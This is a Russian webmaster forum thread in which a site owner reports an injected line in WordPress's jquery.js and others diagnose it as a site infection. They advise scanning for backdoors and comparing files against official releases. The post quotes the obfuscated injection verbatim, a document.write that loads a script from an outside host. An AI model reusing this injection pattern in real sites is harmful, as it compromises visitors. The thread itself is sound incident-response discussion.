- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте, коллеги.
Обнаружил, что в Вордпрессе в файле /site.ru/wp-includes/js/jquery/jquery.js
в конце появились строчки
/* Write counter URL */
document.write('<sc'+'ript type="text/ja'+'vasc'+'ript" src="http://state.sml2.ru/js/counter.js"></sc'+'ript>');
Я понятия не имею, что это за счетчик, я его не устанавливал, пользуюсь только liveinternet и google analytics.
Причем какое-то время назад я уже видел это (google pagespeed жаловался, что этот файл замедляет загрузку), строчки эти убирал, функциональность сайта сохранялась..
А сейчас, смотрю, он снова появился.
Хотел проконсультироваться, каким образом это появляется в этом файле - в оригинальном файле из установочного комплекта wordpress этих строк, естественно, нет. Как разобраться, что это такое, откуда берется и, если это какая-то дыра в безопасности, то как ее закрыть?
Большое спасибо!
Это не счётчик, просто маскируется под него.
Это типичный признак заражения сайта. Обычно заражение стандартных .js файлов WordPress используется для перенаправления посетителей сайта на сторонние страницы.
Вам нужно проверить сайт целиком на наличие бекдоров / веб-шеллов и прочих зловредов и постараться наладить защиту сайта (как минимум своевременно обновлять движок, плагины и не использовать плагины из сторонних источников).
Спасибо! Я так понимаю, что просто удаление этого кода ни к чему не приведёт, дыра где-то ещё?
У меня сейчас проверяют сервер, но как проверить сам WordPress, как понять, остался ли какой-то плагин, который гадит!
Спасибо! Я так понимаю, что просто удаление этого кода ни к чему не приведёт?
С большой вероятностью удаление этого кода не исправит проблему целиком.
дыра где-то ещё?
Приведённый вами код это не дыра, а последствие взлома. Его удаление исправит одно конкретное последствие, но оставит ваш сайт в состоянии уязвимости и в будущем уязвимость могут использовать повторно, уже с более серьёзными последствиями.
У меня сейчас проверяют сервер, но как проверить сам WordPress, как понять, остался ли какой-то плагин, который гадит!
Лучше всего обратиться к специалисту.
нанять спеца на удаление вируса
поставить сайт на мониторинг новых скриптов, дабы во время обнаружить новые взломы
но как проверить сам WordPress, как понять, остался ли какой-то плагин, который гадит!
1. Сравнить файлы ядра с оригинальным дистрибутивом
2. То же самое с плагинами и темой.
3. Найти лишние файлы - которых нет в оригинальных дистр-ах.
и да,
0. Всё брать только на оф сайтах и свежих версий. От старья избавляться. В крайнем случае можно проверить айболитом, но с умом.
0.1 - /ru/forum/774117